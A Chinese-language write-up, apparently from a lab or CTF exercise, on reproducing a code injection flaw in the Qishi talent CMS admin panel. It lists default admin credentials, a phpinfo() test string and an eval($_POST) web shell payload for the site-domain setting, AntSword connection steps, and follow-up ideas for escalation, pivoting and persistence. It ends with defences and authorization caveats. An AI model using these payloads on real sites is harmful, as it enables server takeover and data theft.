骑士人才系统CMS任意代码执行漏洞复现教学文档

一、漏洞概述

骑士人才系统（基于PHP+MYSQL）存在一处任意代码执行漏洞，攻击者可通过后台配置功能注入恶意PHP代码，最终获取服务器控制权限。

二、漏洞环境

• 系统名称：骑士人才系统
• 开发语言：PHP
• 数据库：MySQL
• 默认后台凭证：admin/adminadmin
• 漏洞位置：后台"网站配置"功能中的"网站域名"字段

三、漏洞复现步骤

1. 访问后台管理系统

http://目标网站/index.php?m=Admin

使用默认凭证登录：

• 用户名：admin
• 密码：adminadmin

2. 定位漏洞点

1. 登录后点击"系统"菜单
2. 选择"网站配置"选项
3. 找到"网站域名"配置项

3. 验证代码执行漏洞

在"网站域名"字段输入以下内容：

http://127.0.0.1/.',phpinfo(),'/.com

点击保存后刷新页面，如果看到phpinfo页面，则证明存在代码执行漏洞。

4. 获取WebShell

1. 在"网站域名"字段输入以下内容建立后门：

http://127.0.0.1/.',eval($_POST[a]),'/.com

2. 点击保存配置

5. 使用蚁剑连接

1. 打开中国蚁剑工具
2. 右键"数据管理"空白处，选择"添加数据"
3. 填写以下信息：
   • URL：目标网站地址
   • 连接密码：a (与POST参数名对应)
4. 点击"添加"

6. 获取服务器权限

1. 双击新添加的连接
2. 浏览服务器文件系统
3. 通常在网站根目录下的tmp文件夹中可以找到flag或其他敏感信息

四、漏洞原理分析

该漏洞属于代码注入类型，由于系统在保存网站配置时未对用户输入进行充分过滤，导致攻击者可以通过构造特殊字符串将PHP代码注入到配置文件中。当系统加载这些配置时，注入的代码会被执行。

五、防御措施

1. 输入验证：对所有用户输入进行严格过滤，特别是配置项
2. 输出编码：在显示配置内容时进行HTML编码
3. 权限控制：限制后台管理权限
4. 代码审计：检查所有eval()、system()等危险函数的使用
5. 更新补丁：及时应用官方安全更新

六、扩展利用

1. 信息收集：通过phpinfo()获取服务器配置信息
2. 权限提升：利用服务器配置弱点尝试提权
3. 内网渗透：以被攻陷服务器为跳板进行内网扫描
4. 持久化：创建隐蔽的后门账户或计划任务

七、注意事项

1. 复现漏洞前确保获得合法授权
2. 测试环境应与生产环境隔离
3. 漏洞复现后应及时修复
4. 遵守相关法律法规

八、参考链接

• [骑士人才系统官方网站]
• [PHP安全编程指南]
• [OWASP代码注入防护指南]